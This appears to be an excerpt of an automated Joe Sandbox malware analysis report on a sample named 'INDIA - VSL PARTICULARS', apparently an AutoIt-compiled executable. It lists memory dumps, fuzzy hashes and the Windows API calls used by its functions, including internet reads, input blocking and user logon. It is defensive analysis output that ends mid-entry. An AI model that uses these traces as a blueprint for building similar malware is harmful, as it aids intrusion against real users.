                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                              APIs
                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                              • String ID:
                              • API String ID: 901099227-0
                              • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                              • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                              APIs
                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Proc
                              • String ID:
                              • API String ID: 2346855178-0
                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                              APIs
                              • BlockInput.USER32(00000001), ref: 0045A38B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                              APIs
                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction ID: 02d6163b93c05515ba550c20263bcf17e7f104e2341538ac0d4ee6ad2c62e11e
                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction Fuzzy Hash: D241A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction ID: 38f221608edee91d232daddfb4e47f275e1236f3e7fd847f684ea8135e9f344b
                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction Fuzzy Hash: 23019279E0020AEFCB44DF98C5909AEFBB5FB48310F20859AD809A7701D730AE41DB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction ID: 48017eef1071b47c802fc85e8abde09da200141e462bc2a8e6448e01bad52dca
                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction Fuzzy Hash: 7F019279E0020AEFCB44DF98C5909AEFBB5FB48310F608599E809A7701D730AE41DF80
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                              APIs
                              • DeleteObject.GDI32(?), ref: 0045953B
                              • DeleteObject.GDI32(?), ref: 00459551
                              • DestroyWindow.USER32(?), ref: 00459563
                              • GetDesktopWindow.USER32 ref: 00459581
                              • GetWindowRect.USER32(00000000), ref: 00459588
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                              • ShowWindow.USER32(?,00000004), ref: 00459865
                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                              • GetStockObject.GDI32(00000011), ref: 004598CD
                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                              • DeleteDC.GDI32(00000000), ref: 004598F8
                              • _wcslen.LIBCMT ref: 00459916
                              • _wcscpy.LIBCMT ref: 0045993A
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                              • GetDC.USER32(00000000), ref: 004599FC
                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 4040870279-2373415609
                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0044181E
                              • SetTextColor.GDI32(?,?), ref: 00441826
                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                              • GetSysColor.USER32(0000000F), ref: 00441849
                              • SetBkColor.GDI32(?,?), ref: 00441864
                              • SelectObject.GDI32(?,?), ref: 00441874
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                              • GetSysColor.USER32(00000010), ref: 004418B2
                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                              • DeleteObject.GDI32(?), ref: 004418D5
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                              • FillRect.USER32(?,?,?), ref: 00441970
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
